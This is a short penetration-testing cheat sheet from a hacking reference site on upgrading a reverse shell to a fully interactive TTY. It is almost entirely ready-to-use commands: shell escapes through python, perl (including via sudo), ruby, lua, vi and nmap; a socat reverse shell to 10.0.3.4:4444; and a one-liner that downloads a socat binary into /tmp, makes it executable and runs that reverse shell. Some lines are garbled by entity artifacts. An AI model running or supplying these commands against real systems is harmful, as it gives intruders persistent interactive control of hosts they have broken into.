> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/initial-access/shells/tty-ptty.md).

# TTY/PTTY

Upgrading to a fully interactive TTY using Python\
//Enter while in reverse shell\
$ python -c 'import pty; pty.spawn("/bin/bash")'\
Ctrl-Z\
// In Kali\
$ stty raw -echo\
$ fg //hit enter twice\
\
$ export SHELL=bash\
$ export TERM=xterm-256color //or just xterm\
$ stty rows 38 columns 116\
//may have to ctrl-z again\
\
\
Python:\
python -c 'import pty; pty.spawn("/bin/bash")'\
\
**echo os.system('/bin/bash')**\
\
\&#xNAN;**/**&#x62;i&#x6E;**/sh -i**\
\
within root bash script: bash -i\
\
**perl —e 'exec "/bin/sh";'**\
sudo /usr/bin/**perl —e 'exec ("/bin/bash")'**\
perl file: **exec "/bin/sh";**\
\
ruby: exec "/bin/sh"\
\
lua: os.execute('/bin/bash')\
\
within IRB: **exec "/bin/sh"**\
\
within vi:\
:**!bash**\
or\
:set shell=/bin/bash:shell\
\
within nmap:\
\&#xNAN;**!sh**\
\
Check and using expect for a tty:\
`$ expect -v`\
`expect version 5.45.4`\
\
`$ cat > /tmp/shell.sh <<EOF`\
`#!/usr/bin/expect`\
`spawn bash`\
`interact`\
`EOF`\
\
`$ chmod u+x /tmp/shell.sh`\
`$ /tmp/shell.sh`\
\
Socat tty shell:\
listener:\
``socat file:`tty`,raw,echo=0 tcp-listen:4444``\
client:\
`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444`\
or if socat is not installed\
`wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444`\ <br>
